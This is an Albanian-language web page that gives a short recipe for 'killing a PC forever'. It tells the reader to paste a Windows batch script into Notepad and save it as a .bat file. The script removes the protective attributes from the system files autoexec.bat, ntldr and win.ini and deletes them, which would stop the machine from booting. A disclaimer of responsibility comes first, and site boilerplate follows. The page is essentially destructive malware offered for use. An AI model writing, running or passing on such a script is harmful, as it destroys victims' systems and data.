fikja pc pergjithmon
fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju.


HAPIM notepadin dhe vendosim ket kod:@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.inie ruajm fajllin me qfar do emri nuk o me rendesi mirpo me prapashtesen .bat

per ta ruajtusi bat file tek rubrika text file document nderrojni ne all files.
 
 
Advertisement
 
 
 
 
 
 
Sod ne faqen ton pati 280971 visitors (1398222 hits) Ne ket faqe
=> Do you also want a homepage for free? Then click here! <=